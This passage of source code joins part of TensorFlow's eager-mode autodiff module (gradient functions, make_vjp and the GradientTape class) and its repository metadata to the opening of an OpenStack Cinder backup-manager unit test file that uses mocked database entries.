result = _magic_gradient_function(op_name, attrs, num_inputs,
op_inputs, op_outputs, orig_outputs)
if _tracing:
print("Gradient for", op_name, "inputs", op_inputs, "output_grads",
orig_outputs, "gradients", result)
return nest.flatten(result)
return grad_fn
pywrap_tensorflow.TFE_Py_RegisterBackwardFunctionGetter(_get_backward_fn)
def _record_gradient(op_name, inputs, attrs, results, name):
return pywrap_tensorflow.TFE_Py_RecordGradient(op_name, inputs, attrs,
results, name)
execute.record_gradient = _record_gradient
def implicit_val_and_grad(f):
"""Returns a function which differentiates f with respect to variables.
The wrapped function returns the value and the gradient of f when called with
the same arguments. The gradient is with respect to all TFE variables which
have `variable.watch()` called on them by f.
This function is useful when the exact set of variables to differentiate with
is not known ahead of time.
Example:
```python
dense_layer = tf.layers.Dense(1)
def loss(x, y):
return tf.reduce_sum(tf.square(dense_layer(x) - y))
# Obtain the gradient function.
val_grad_fn = tfe.implicit_value_and_gradients(loss)
# Invoke the gradient function with concrete values of x and y.
x = tf.constant([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
y = tf.constant([[10.0], [20.0]])
value, grads_and_vars = val_grad_fn(x, y)
print('Value of loss: %s' % value)
# Apply the gradients to Variables.
optimizer = tf.train.GradientDescentOptimizer(0.1)
optimizer.apply_gradients(grads_and_vars)
```
Args:
f: function to be differentiated. If `f` returns a scalar, this scalar will
be differentiated. If `f` returns a tensor or list of tensors, by default
a scalar will be computed by adding all their values to produce a single
scalar.
Returns:
A function which, when called, returns a tuple pair.
Its first element is the value to which the function evaluates.
Its second element is list of (gradient, variable) pairs.
Raises:
ValueError: if `f` returns None.
"""
# TODO(cais): Remove calls to tf.constant() once the gradients functions
# accept lists and np.ndarrays.
def grad_fn(*args):
"""Computes the gradient of the wrapped function."""
this_tape = tape.push_new_tape()
try:
end_node = f(*args)
if end_node is None:
raise ValueError("Cannot differentiate a function that returns None; "
"did you forget to return a value from {}?".format(
f.__name__))
finally:
tape.pop_tape(this_tape)
# Sorting variables by id, which is monotonically increasing in construction
# order. This ensures unique order across executions.
# TODO(josh11b): Move the sort to the C++ implementation in pywrap_tfe_src.cc.
variables = list(sorted(this_tape.watched_variables(),
key=lambda v: v.handle._id)) # pylint: disable=protected-access
sources = [x.handle for x in variables]
if not sources:
raise ValueError("No trainable variables were accessed while the "
"function was being computed.")
grad = imperative_grad.imperative_grad(_default_vspace,
this_tape,
nest.flatten(end_node),
sources)
return end_node, list(zip(grad, variables))
return grad_fn
def implicit_grad(f):
"""Returns a function which differentiates f with respect to variables.
The wrapped function returns the gradient of f when called with the same
arguments. The gradient is with respect to all TFE variables which have
`variable.watch()` called on them by f.
This function is useful when the exact set of variables to differentiate with
is not known ahead of time.
Example:
```python
dense_layer = tf.layers.Dense(1)
def loss(x, y):
return tf.reduce_sum(tf.square(dense_layer(x) - y))
# Obtain the gradient function.
grad_fn = tfe.implicit_gradients(loss)
# Invoke the gradient function with concrete values of x and y.
x = tf.constant([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
y = tf.constant([[10.0], [20.0]])
grads_and_vars = grad_fn(x, y)
# Apply the gradients to Variables.
optimizer = tf.train.GradientDescentOptimizer(0.1)
optimizer.apply_gradients(grads_and_vars)
```
Args:
f: function to be differentiated. If `f` returns a scalar, this scalar will
be differentiated. If `f` returns a tensor or list of tensors, by default
a scalar will be computed by adding all their values to produce a single
scalar.
Returns:
A function which, when called, returns a list of (gradient, variable) pairs.
"""
# TODO(cais): Remove calls to tf.constant() once the gradients functions
# accept lists and np.ndarrays.
def grad_fn(*args, **kwds):
"""Computes the gradient of the wrapped function."""
return implicit_val_and_grad(f)(*args, **kwds)[1]
return grad_fn
def _get_arg_spec(f, params, param_args):
"""The positions of the parameters of f to be differentiated in param_args."""
try:
args = tf_inspect.getargspec(f).args
except TypeError as e:
# TypeError can happen when f is a callable object.
if params is None:
return range(len(param_args))
elif all(isinstance(x, int) for x in params):
return params
raise ValueError("Either callable provided is not a function or could not "
"inspect its arguments by name: %s. Original error: %s"
% (f, e))
if params is None:
if not args:
return range(len(param_args))
return range(len(args))
elif all(isinstance(x, six.string_types) for x in params):
return [args.index(n) for n in params]
elif all(isinstance(x, int) for x in params):
return params
else:
raise ValueError(
"params must be all strings or all integers; got %s." % params)
def gradients_function(f, params=None):
"""Returns a function which differentiates f with respect to params.
Example:
```python
# f(x, y) = (x ^ 3) * y - x * (y ^ 2)
# Therefore, the 1st order derivatives are:
# df / dx = 3 * (x ^ 2) * y - y ^ 2
# df / dy = x ^ 3 - 2 * x * y
# The 2nd order derivatives with respect to x is:
# d^2 f / (dx)^2 = 6 * x * y
def f(x, y):
return x * x * x * y - x * y * y
# Obtain a function that returns 1st order gradients.
grad_fn = tfe.gradients_function(f)
x = 2.0
y = 3.0
# Invoke the 1st order gradient function.
x_grad, y_grad = grad_fn(x, y)
assert x_grad.numpy() == 3 * (2 ** 2) * 3 - 3 ** 2
assert y_grad.numpy() == (2 ** 3) - 2 * 2 * 3
# Obtain a function that returns the 2nd order gradient with respect to x.
gradgrad_fn = tfe.gradients_function(lambda x, y: grad_fn(x, y)[0])
# Invoke the 2nd order gradient function.
x_gradgrad = gradgrad_fn(x, y)[0]
assert x_gradgrad.numpy() == 6 * 2 * 3
# To obtain a callable that returns the gradient(s) of `f` with respect to a
# subset of its inputs, use the `params` keyword argument with
# `gradients_function()`.
ygrad_fn = tfe.gradients_function(f, params=[1])
(y_grad,) = ygrad_fn(x, y)
assert y_grad.numpy() == (2 ** 3) - 2 * 2 * 3
```
Args:
f: function to be differentiated. If `f` returns a scalar, this scalar will
be differentiated. If `f` returns a tensor or list of tensors, by default
a scalar will be computed by adding all their values to produce a single
scalar. If desired, the tensors can be elementwise multiplied by the
tensors passed as the `dy` keyword argument to the returned gradient
function.
params: list of parameter names of f or list of integers indexing the
parameters with respect to which we'll differentiate. Passing None
differentiates with respect to all parameters.
Returns:
function which, when called, returns the value of f and the gradient
of f with respect to all of `params`. The function takes an extra optional
keyword argument "dy". Setting it allows computation of vector jacobian
products for vectors other than the vector of ones.
Raises:
ValueError: if the params are not all strings or all integers.
"""
def decorated(*args, **kwds):
"""Computes the gradient of the decorated function."""
_, grad = val_and_grad_function(f, params=params)(*args, **kwds)
return grad
return decorated
def _ensure_unique_tensor_objects(parameter_positions, args):
"""Make each of the parameter_positions in args a unique ops.Tensor object.
Ensure that each parameter is treated independently.
For example:
def f(x, y): return x * y
g = gradients_function(f)
one = tf.constant(1.)
g(one, one) should return [1., 1.]
(even though the two arguments are the same Tensor object).
Args:
parameter_positions: List of indices into args defining the arguments to
differentiate against.
args: A list of arguments to the function to be differentiated.
Returns:
args, possibly edited in-place.
"""
s = set()
for (i, t) in enumerate(args):
if i in parameter_positions:
tid = ops.tensor_id(t)
if tid in s:
args[i] = gen_array_ops.identity(args[i])
else:
s.add(tid)
return args
def val_and_grad_function(f, params=None):
"""Returns a function that computes f and its derivative w.r.t. params.
Example:
```python
# f(x, y) = (x ^ 3) * y - x * (y ^ 2)
# Therefore, the 1st order derivatives are:
# df / dx = 3 * (x ^ 2) * y - y ^ 2
# df / dy = x ^ 3 - 2 * x * y
def f(x, y):
return x * x * x * y - x * y * y
# Obtain a function that returns the function value and the 1st order
# gradients.
val_grads_fn = tfe.value_and_gradients_function(f)
x = 2.0
y = 3.0
# Invoke the value-and-gradients function.
f_val, (x_grad, y_grad) = val_grads_fn(x, y)
assert f_val.numpy() == (2 ** 3) * 3 - 2 * (3 ** 2)
assert x_grad.numpy() == 3 * (2 ** 2) * 3 - 3 ** 2
assert y_grad.numpy() == (2 ** 3) - 2 * 2 * 3
# To obtain a callable that returns the value of `f` and the gradient(s) of
# `f` with respect to a subset of its inputs, use the `params` keyword
# argument with `value_and_gradients_function()`.
val_ygrad_fn = tfe.value_and_gradients_function(f, params=[1])
f_val, (y_grad,) = val_ygrad_fn(x, y)
assert f_val.numpy() == (2 ** 3) * 3 - 2 * (3 ** 2)
assert y_grad.numpy() == (2 ** 3) - 2 * 2 * 3
```
Args:
f: function to be differentiated. If `f` returns a scalar, this scalar will
be differentiated. If `f` returns a tensor or list of tensors, by default
a scalar will be computed by adding all their values to produce a single
scalar. If desired, the tensors can be elementwise multiplied by the
tensors passed as the `dy` keyword argument to the returned gradient
function.
params: list of parameter names of f or list of integers indexing the
parameters with respect to which we'll differentiate. Passing `None`
differentiates with respect to all parameters.
Returns: function which, when called, returns the value of f and the gradient
of f with respect to all of `params`. The function takes an extra optional
keyword argument "dy". Setting it allows computation of vector jacobian
products for vectors other than the vector of ones.
Raises:
ValueError: if the params are not all strings or all integers.
"""
def decorated(*args, **kwds):
"""Computes the value and gradient of the decorated function."""
dy = kwds.pop("dy", None)
if kwds:
raise ValueError("Functions to be differentiated cannot "
"receive keyword arguments.")
val, vjp = make_vjp(f, params)(*args, **kwds)
return val, vjp(dy=dy)
return decorated
def make_vjp(f, params=None, persistent=True):
"""Returns a function that computes f and is vjp w.r.t. params.
The term "vjp" here is an abbreviation for vector-jacobian product.
Args:
f: the function to be differentiated.
params: the parameters (numbers or names) to differentiate with respect to.
A value of None will differentiate with respect to all parameters.
persistent: Boolean controlling whether the VJP function can be re-used.
Must be True or False.
Returns:
A function, which when called, returns a tuple (value, vjp), where:
- value is the result of calling f.
- vjp is a function, which takes a vector as an argument and
returns the product of that vector with the Jacobian of f.
Providing no argument to vjp is equivalent to providing a
vector of ones.
For example,
```python
def f(x):
return x * x
wrapped_fn = tfe.make_vjp(f)
result, vjp = wrapped_fn(tf.constant(3.0))
# result is 9.0
vjp() # the vjp function rturns 6.0
Raises:
ValueError: if `f` returns None.
"""
def decorated(*args, **kwds):
"""Computes the value and gradient of the decorated function."""
parameter_positions = _get_arg_spec(f, params, args)
assert not kwds, "The gradient function can't take keyword arguments."
this_tape = tape.push_new_tape(persistent=persistent)
try:
sources = []
args = [
ops.convert_to_tensor(args[i])
if i in parameter_positions else args[i]
for i in range(len(args))
]
args = _ensure_unique_tensor_objects(parameter_positions, args)
for i in parameter_positions:
sources.append(args[i])
tape.watch(args[i])
result = f(*args)
if result is None:
raise ValueError("Cannot differentiate a function that returns None; "
"did you forget to return a value from {}?".format(
f.__name__))
flat_result = nest.flatten(result)
flat_result = [gen_array_ops.identity(x) for x in flat_result]
result = nest.pack_sequence_as(result, flat_result)
finally:
tape.pop_tape(this_tape)
def vjp(dy=None):
if dy is not None:
dy = [ops.convert_to_tensor(x) for x in nest.flatten(dy)]
return imperative_grad.imperative_grad(
_default_vspace, this_tape, nest.flatten(result), sources,
output_gradients=dy)
return result, vjp
return decorated
def _aggregate_grads(gradients):
"""Aggregate gradients from multiple sources.
Args:
gradients: A list of 'Tensor' or 'IndexedSlices' gradients.
Returns:
If 'gradients' only has 'Tensor', returns an aggregated 'Tensor'.
Otherwise returns an aggregated 'IndexedSlices'.
"""
assert gradients, "No gradients to aggregate"
if len(gradients) == 1:
return gradients[0]
if all([isinstance(g, ops.Tensor) for g in gradients]):
return math_ops.add_n(gradients)
else:
assert all([isinstance(g, (ops.Tensor, ops.IndexedSlices))
for g in gradients])
indexed_slices_list = []
for grad in gradients:
# TODO(xpan): Support nested IndexedSlices and core IndexedSlices
if isinstance(grad, ops.Tensor):
indexed_slices = ops.IndexedSlices(
grad,
math_ops.range(grad.shape[0]),
constant_op.constant(grad.shape.as_list()))
indexed_slices_list.append(indexed_slices)
else:
indexed_slices_list.append(grad)
# Dense shapes from all gradients should be the same.
dense_shape = indexed_slices_list[0].dense_shape
# For simplicity now, always cast to int64.
indices = array_ops.concat([math_ops.cast(x.indices, dtypes.int64)
for x in indexed_slices_list], 0)
values = array_ops.concat([x.values for x in indexed_slices_list], 0)
return ops.IndexedSlices(values, indices, dense_shape)
def _num_elements(grad):
"""The number of elements in the `grad` tensor."""
if isinstance(grad, ops.Tensor):
return functools.reduce(operator.mul, grad._shape_tuple(), 1) # pylint: disable=protected-access
if isinstance(grad, ops.IndexedSlices):
return functools.reduce(operator.mul, grad.values._shape_tuple(), 1) # pylint: disable=protected-access
raise ValueError("`grad` not a Tensor or IndexedSlices.")
_zeros_cache = context._TensorCache() # pylint: disable=protected-access
def _fast_fill(value, shape, dtype):
return array_ops.fill(shape, constant_op.constant(value, dtype=dtype))
def _zeros(shape, dtype):
"""Wraps array_ops.zeros to cache last zero for a given shape and dtype."""
device = context.context().device_name
if dtype == dtypes.variant:
# TODO(apassos): need to save enough information about variant tensors to do
# a zeros
return None
cache_key = shape, dtype, device
cached = _zeros_cache.get(cache_key)
if cached is None:
cached = _fast_fill(0, shape, dtype)
_zeros_cache.put(cache_key, cached)
return cached
def _ones(shape, dtype):
if shape == (): # pylint: disable=g-explicit-bool-comparison
return constant_op.constant(1, dtype=dtype)
return _fast_fill(1, shape, dtype)
_default_vspace = imperative_grad.VSpace(
num_elements_fn=_num_elements,
aggregate_fn=_aggregate_grads,
tensor_id=ops.tensor_id,
zeros=_zeros,
ones=_ones)
@tf_export("GradientTape")
class GradientTape(object):
"""Record operations for automatic differentiation.
Operations are recorded if they are executed within this context manager and
at least one of their inputs is being "watched".
Variables (created by `tf.contrib.eager.Variable` or @{tf.get_variable})
are automatically watched. Tensors can be manually watched by invoking the
`watch`
method on this context manager.
For example, consider the function `y = x * x`. The gradient at `x = 3.0` can
be computed as:
```python
x = tf.constant(3.)
with tfe.GradientTape() as g:
g.watch(x)
y = x * x
grad = g.gradient(y, [x])[0] # Will compute to 6.0
```
GradientTapes can be nested to compute higher-order derivatives. For example,
```python
x = tf.constant(3.0)
with tfe.GradientTape() as g:
with tfe.GradientTape() as gg:
gg.watch(x)
y = x * x
dy_dx = gg.gradient(y, [x])[0] # Will compute to 6.0
d2y_dx2 = g.gradient(dy_dx, [x])[0] # Will compute to 2.0
```
By default, the resources held by a GradientTape are released as soon as
GradientTape.gradient() method is called. To compute multiple gradients over
the same computation, create a persistent gradient tape. This allows multiple
calls to the gradient() method as resources are released when the tape object
is garbage collected. For example:
```python
x = tf.constant(3.0)
with tfe.GradientTape(persistent=True) as g:
g.watch(x)
y = x * x
z = y * y
dy_dx = g.gradient(z, [x])[0] # 6.0
dz_dx = g.gradient(y, [x])[0] # 108.0 (4*x^3 at x = 3)
del g # Drop the reference to the tape
"""
def __init__(self, persistent=False):
"""Creates a new GradientTape.
Args:
persistent: Boolean controlling whether a persistent gradient tape
is created. False by default, which means at most one call can
be made to the gradient() method on this object.
"""
self._tape = None
self._persistent = persistent
def __enter__(self):
self._tape = tape.push_new_tape(persistent=self._persistent)
return self
def __exit__(self, typ, value, traceback):
tape.pop_tape(self._tape)
def watch(self, tensor):
"""Ensures that `tensor` is being traced by this tape.
Args:
tensor: a Tensor or list of Tensors.
"""
for t in nest.flatten(tensor):
if isinstance(t, resource_variable_ops.ResourceVariable):
t = t.handle
tape.watch(t)
def watched_variables(self):
# Sorting variables by id, which is monotonically increasing in construction
# order. This ensures unique order across executions.
# TODO(josh11b): Move the sort to the C++ implementation in pywrap_tfe_src.cc.
return list(sorted(self._tape.watched_variables(),
key=lambda v: v.handle._id)) # pylint: disable=protected-access
def gradient(self, target, sources, output_gradients=None):
"""Computes the gradient using operations recorded in context of this tape.
Args:
target: Tensor to be differentiated.
sources: a list of Tensors or Variables. `target` will be differentiated
against elements in `sources`.
output_gradients: a list of gradients, one for each element of
target. Defaults to None.
Returns:
a list of Tensors (or IndexedSlices, or None), one for each element in
`sources`.
Raises:
RuntimeError: if called inside the context of the tape, or if called more
than once on a non-persistent tape.
"""
if self._tape is None:
raise RuntimeError("GradientTape.gradient can only be called once "
"on non-persistent tapes, and "
"only when the context manager has exited.")
sources = [x.handle if isinstance(x, resource_variable_ops.ResourceVariable)
else x
for x in sources]
grad = imperative_grad.imperative_grad(
_default_vspace, self._tape, [target], sources,
output_gradients=output_gradients)
if not self._persistent:
self._tape = None
return grad
| {
"content_hash": "fe2bb0d2dd946e790557ea3dcd425eba",
"timestamp": "",
"source": "github",
"line_count": 745,
"max_line_length": 108,
"avg_line_length": 34.60536912751678,
"alnum_prop": 0.6677398083860208,
"repo_name": "Xeralux/tensorflow",
"id": "06e11f6ef9985e078b98c5f1e3d9d0edeef2df56",
"size": "26470",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/python/eager/backprop.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "9274"
},
{
"name": "C",
"bytes": "340972"
},
{
"name": "C++",
"bytes": "39479562"
},
{
"name": "CMake",
"bytes": "194702"
},
{
"name": "Go",
"bytes": "1046987"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "567239"
},
{
"name": "Jupyter Notebook",
"bytes": "1940883"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "48231"
},
{
"name": "Objective-C",
"bytes": "12456"
},
{
"name": "Objective-C++",
"bytes": "94385"
},
{
"name": "PHP",
"bytes": "2140"
},
{
"name": "Perl",
"bytes": "6179"
},
{
"name": "Perl 6",
"bytes": "1357"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "33675501"
},
{
"name": "Ruby",
"bytes": "533"
},
{
"name": "Shell",
"bytes": "425916"
}
],
"symlink_target": ""
} |
"""Tests for Backup code."""
import ddt
import tempfile
import uuid
import mock
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import timeutils
from cinder.backup import api
from cinder.backup import manager
from cinder import context
from cinder import db
from cinder import exception
from cinder import objects
from cinder import test
from cinder.tests.unit.backup import fake_service_with_verify as fake_service
from cinder.volume.drivers import lvm
CONF = cfg.CONF
class FakeBackupException(Exception):
pass
class BaseBackupTest(test.TestCase):
def setUp(self):
super(BaseBackupTest, self).setUp()
vol_tmpdir = tempfile.mkdtemp()
self.flags(volumes_dir=vol_tmpdir)
self.backup_mgr = importutils.import_object(CONF.backup_manager)
self.backup_mgr.host = 'testhost'
self.ctxt = context.get_admin_context()
self.backup_mgr.driver.set_initialized()
def _create_backup_db_entry(self, volume_id=1, display_name='test_backup',
display_description='this is a test backup',
container='volumebackups',
status='creating',
size=1,
object_count=0,
project_id='fake',
service=None,
temp_volume_id=None,
temp_snapshot_id=None):
"""Create a backup entry in the DB.
Return the entry ID
"""
kwargs = {}
kwargs['volume_id'] = volume_id
kwargs['user_id'] = 'fake'
kwargs['project_id'] = project_id
kwargs['host'] = 'testhost'
kwargs['availability_zone'] = '1'
kwargs['display_name'] = display_name
kwargs['display_description'] = display_description
kwargs['container'] = container
kwargs['status'] = status
kwargs['fail_reason'] = ''
kwargs['service'] = service or CONF.backup_driver
kwargs['snapshot'] = False
kwargs['parent_id'] = None
kwargs['size'] = size
kwargs['object_count'] = object_count
kwargs['temp_volume_id'] = temp_volume_id
kwargs['temp_snapshot_id'] = temp_snapshot_id
backup = objects.Backup(context=self.ctxt, **kwargs)
backup.create()
return backup
def _create_volume_db_entry(self, display_name='test_volume',
display_description='this is a test volume',
status='backing-up',
previous_status='available',
size=1):
"""Create a volume entry in the DB.
Return the entry ID
"""
vol = {}
vol['size'] = size
vol['host'] = 'testhost'
vol['user_id'] = 'fake'
vol['project_id'] = 'fake'
vol['status'] = status
vol['display_name'] = display_name
vol['display_description'] = display_description
vol['attach_status'] = 'detached'
vol['availability_zone'] = '1'
vol['previous_status'] = previous_status
return db.volume_create(self.ctxt, vol)['id']
def _create_snapshot_db_entry(self, display_name='test_snapshot',
display_description='test snapshot',
status='available',
size=1,
volume_id='1',
provider_location=None):
"""Create a snapshot entry in the DB.
Return the entry ID.
"""
kwargs = {}
kwargs['size'] = size
kwargs['host'] = 'testhost'
kwargs['user_id'] = 'fake'
kwargs['project_id'] = 'fake'
kwargs['status'] = status
kwargs['display_name'] = display_name
kwargs['display_description'] = display_description
kwargs['volume_id'] = volume_id
kwargs['cgsnapshot_id'] = None
kwargs['volume_size'] = size
kwargs['provider_location'] = provider_location
snapshot_obj = objects.Snapshot(context=self.ctxt, **kwargs)
snapshot_obj.create()
return snapshot_obj
def _create_volume_attach(self, volume_id):
values = {'volume_id': volume_id,
'attach_status': 'attached', }
attachment = db.volume_attach(self.ctxt, values)
db.volume_attached(self.ctxt, attachment['id'], None, 'testhost',
'/dev/vd0')
def _create_exported_record_entry(self, vol_size=1, exported_id=None):
"""Create backup metadata export entry."""
vol_id = self._create_volume_db_entry(status='available',
size=vol_size)
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id)
if exported_id is not None:
backup.id = exported_id
export = self.backup_mgr.export_record(self.ctxt, backup)
return export
def _create_export_record_db_entry(self,
volume_id='0000',
status='creating',
project_id='fake',
backup_id=None):
"""Create a backup entry in the DB.
Return the entry ID
"""
kwargs = {}
kwargs['volume_id'] = volume_id
kwargs['user_id'] = 'fake'
kwargs['project_id'] = project_id
kwargs['status'] = status
if backup_id:
kwargs['id'] = backup_id
backup = objects.BackupImport(context=self.ctxt, **kwargs)
backup.create()
return backup
@ddt.ddt
class BackupTestCase(BaseBackupTest):
"""Test Case for backups."""
@mock.patch.object(lvm.LVMVolumeDriver, 'delete_snapshot')
@mock.patch.object(lvm.LVMVolumeDriver, 'delete_volume')
def test_init_host(self, mock_delete_volume, mock_delete_snapshot):
"""Test stuck volumes and backups.
Make sure stuck volumes and backups are reset to correct
states when backup_manager.init_host() is called
"""
vol1_id = self._create_volume_db_entry()
self._create_volume_attach(vol1_id)
db.volume_update(self.ctxt, vol1_id, {'status': 'backing-up'})
vol2_id = self._create_volume_db_entry()
self._create_volume_attach(vol2_id)
db.volume_update(self.ctxt, vol2_id, {'status': 'restoring-backup'})
vol3_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol3_id, {'status': 'available'})
vol4_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol4_id, {'status': 'backing-up'})
temp_vol_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, temp_vol_id, {'status': 'available'})
vol5_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol5_id, {'status': 'backing-up'})
temp_snap = self._create_snapshot_db_entry()
temp_snap.status = 'available'
temp_snap.save()
vol6_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol6_id, {'status': 'restoring-backup'})
backup1 = self._create_backup_db_entry(status='creating',
volume_id=vol1_id)
backup2 = self._create_backup_db_entry(status='restoring',
volume_id=vol2_id)
backup3 = self._create_backup_db_entry(status='deleting',
volume_id=vol3_id)
self._create_backup_db_entry(status='creating',
volume_id=vol4_id,
temp_volume_id=temp_vol_id)
self._create_backup_db_entry(status='creating',
volume_id=vol5_id,
temp_snapshot_id=temp_snap.id)
self.backup_mgr.init_host()
vol1 = db.volume_get(self.ctxt, vol1_id)
self.assertEqual('available', vol1['status'])
vol2 = db.volume_get(self.ctxt, vol2_id)
self.assertEqual('error_restoring', vol2['status'])
vol3 = db.volume_get(self.ctxt, vol3_id)
self.assertEqual('available', vol3['status'])
vol4 = db.volume_get(self.ctxt, vol4_id)
self.assertEqual('available', vol4['status'])
vol5 = db.volume_get(self.ctxt, vol5_id)
self.assertEqual('available', vol5['status'])
vol6 = db.volume_get(self.ctxt, vol6_id)
self.assertEqual('error_restoring', vol6['status'])
backup1 = db.backup_get(self.ctxt, backup1.id)
self.assertEqual('error', backup1['status'])
backup2 = db.backup_get(self.ctxt, backup2.id)
self.assertEqual('available', backup2['status'])
self.assertRaises(exception.BackupNotFound,
db.backup_get,
self.ctxt,
backup3.id)
self.assertTrue(mock_delete_volume.called)
self.assertTrue(mock_delete_snapshot.called)
@mock.patch('cinder.objects.backup.BackupList.get_all_by_host')
@mock.patch('cinder.manager.SchedulerDependentManager._add_to_threadpool')
def test_init_host_with_service_inithost_offload(self,
mock_add_threadpool,
mock_get_all_by_host):
self.override_config('backup_service_inithost_offload', True)
vol1_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol1_id, {'status': 'available'})
backup1 = self._create_backup_db_entry(status='deleting',
volume_id=vol1_id)
vol2_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol2_id, {'status': 'available'})
backup2 = self._create_backup_db_entry(status='deleting',
volume_id=vol2_id)
mock_get_all_by_host.return_value = [backup1, backup2]
self.backup_mgr.init_host()
calls = [mock.call(self.backup_mgr.delete_backup, mock.ANY, backup1),
mock.call(self.backup_mgr.delete_backup, mock.ANY, backup2)]
mock_add_threadpool.assert_has_calls(calls, any_order=True)
self.assertEqual(2, mock_add_threadpool.call_count)
def test_init_host_handles_exception(self):
"""Test that exception in cleanup is handled."""
self.mock_object(self.backup_mgr, '_init_volume_driver')
mock_cleanup = self.mock_object(
self.backup_mgr,
'_cleanup_incomplete_backup_operations')
mock_cleanup.side_effect = [Exception]
self.assertIsNone(self.backup_mgr.init_host())
def test_cleanup_incomplete_backup_operations_with_exceptions(self):
"""Test cleanup resilience in the face of exceptions."""
fake_volume_list = [{'id': 'vol1'}, {'id': 'vol2'}]
mock_volume_get_by_host = self.mock_object(
db, 'volume_get_all_by_host')
mock_volume_get_by_host.return_value = fake_volume_list
mock_volume_cleanup = self.mock_object(
self.backup_mgr, '_cleanup_one_volume')
mock_volume_cleanup.side_effect = [Exception]
fake_backup_list = [{'id': 'bkup1'}, {'id': 'bkup2'}, {'id': 'bkup3'}]
mock_backup_get_by_host = self.mock_object(
objects.BackupList, 'get_all_by_host')
mock_backup_get_by_host.return_value = fake_backup_list
mock_backup_cleanup = self.mock_object(
self.backup_mgr, '_cleanup_one_backup')
mock_backup_cleanup.side_effect = [Exception]
mock_temp_cleanup = self.mock_object(
self.backup_mgr, '_cleanup_temp_volumes_snapshots_for_one_backup')
mock_temp_cleanup.side_effect = [Exception]
self.assertIsNone(
self.backup_mgr._cleanup_incomplete_backup_operations(
self.ctxt))
self.assertEqual(len(fake_volume_list), mock_volume_cleanup.call_count)
self.assertEqual(len(fake_backup_list), mock_backup_cleanup.call_count)
self.assertEqual(len(fake_backup_list), mock_temp_cleanup.call_count)
def test_cleanup_one_backing_up_volume(self):
"""Test cleanup_one_volume for volume status 'backing-up'."""
mock_get_manager = self.mock_object(
self.backup_mgr, '_get_manager')
mock_get_manager.return_value = 'fake_manager'
volume_id = self._create_volume_db_entry(status='backing-up',
previous_status='available')
volume = db.volume_get(self.ctxt, volume_id)
self.backup_mgr._cleanup_one_volume(self.ctxt, volume)
volume = db.volume_get(self.ctxt, volume_id)
self.assertEqual('available', volume['status'])
def test_cleanup_one_restoring_backup_volume(self):
"""Test cleanup_one_volume for volume status 'restoring-backup'."""
mock_get_manager = self.mock_object(
self.backup_mgr, '_get_manager')
mock_get_manager.return_value = 'fake_manager'
volume_id = self._create_volume_db_entry(status='restoring-backup')
volume = db.volume_get(self.ctxt, volume_id)
self.backup_mgr._cleanup_one_volume(self.ctxt, volume)
volume = db.volume_get(self.ctxt, volume_id)
self.assertEqual('error_restoring', volume['status'])
def test_cleanup_one_creating_backup(self):
"""Test cleanup_one_backup for volume status 'creating'."""
backup = self._create_backup_db_entry(status='creating')
self.backup_mgr._cleanup_one_backup(self.ctxt, backup)
self.assertEqual('error', backup.status)
def test_cleanup_one_restoring_backup(self):
"""Test cleanup_one_backup for volume status 'restoring'."""
backup = self._create_backup_db_entry(status='restoring')
self.backup_mgr._cleanup_one_backup(self.ctxt, backup)
self.assertEqual('available', backup.status)
def test_cleanup_one_deleting_backup(self):
"""Test cleanup_one_backup for volume status 'deleting'."""
backup = self._create_backup_db_entry(status='deleting')
self.backup_mgr._cleanup_one_backup(self.ctxt, backup)
self.assertRaises(exception.BackupNotFound,
db.backup_get,
self.ctxt,
backup.id)
def test_detach_all_attachments_handles_exceptions(self):
"""Test detach_all_attachments with exceptions."""
mock_log = self.mock_object(manager, 'LOG')
mock_volume_mgr = mock.Mock()
mock_detach_volume = mock_volume_mgr.detach_volume
mock_detach_volume.side_effect = [Exception]
fake_attachments = [
{
'id': 'attachment1',
'attached_host': 'testhost',
'instance_uuid': None,
},
{
'id': 'attachment2',
'attached_host': 'testhost',
'instance_uuid': None,
}
]
fake_volume = {
'id': 'fake_volume_id',
'volume_attachment': fake_attachments
}
self.backup_mgr._detach_all_attachments(self.ctxt,
mock_volume_mgr,
fake_volume)
self.assertEqual(len(fake_attachments), mock_log.exception.call_count)
@ddt.data(KeyError, exception.VolumeNotFound)
def test_cleanup_temp_volumes_snapshots_for_one_backup_volume_not_found(
self, err):
"""Ensure we handle missing volume for a backup."""
mock_volume_get = self.mock_object(db, 'volume_get')
mock_volume_get.side_effect = [err]
backup = self._create_backup_db_entry(status='creating')
self.assertIsNone(
self.backup_mgr._cleanup_temp_volumes_snapshots_for_one_backup(
self.ctxt,
backup))
def test_cleanup_temp_snapshot_for_one_backup_not_found(self):
"""Ensure we handle missing temp snapshot for a backup."""
mock_delete_snapshot = self.mock_object(
lvm.LVMVolumeDriver, 'delete_snapshot')
vol1_id = self._create_volume_db_entry()
self._create_volume_attach(vol1_id)
db.volume_update(self.ctxt, vol1_id, {'status': 'backing-up'})
backup = self._create_backup_db_entry(status='error',
volume_id=vol1_id,
temp_snapshot_id='fake')
self.assertIsNone(
self.backup_mgr._cleanup_temp_volumes_snapshots_for_one_backup(
self.ctxt,
backup))
self.assertFalse(mock_delete_snapshot.called)
self.assertIsNone(backup.temp_snapshot_id)
backup.destroy()
db.volume_destroy(self.ctxt, vol1_id)
def test_cleanup_temp_volume_for_one_backup_not_found(self):
"""Ensure we handle missing temp volume for a backup."""
mock_delete_volume = self.mock_object(
lvm.LVMVolumeDriver, 'delete_volume')
vol1_id = self._create_volume_db_entry()
self._create_volume_attach(vol1_id)
db.volume_update(self.ctxt, vol1_id, {'status': 'backing-up'})
backup = self._create_backup_db_entry(status='error',
volume_id=vol1_id,
temp_volume_id='fake')
self.assertIsNone(
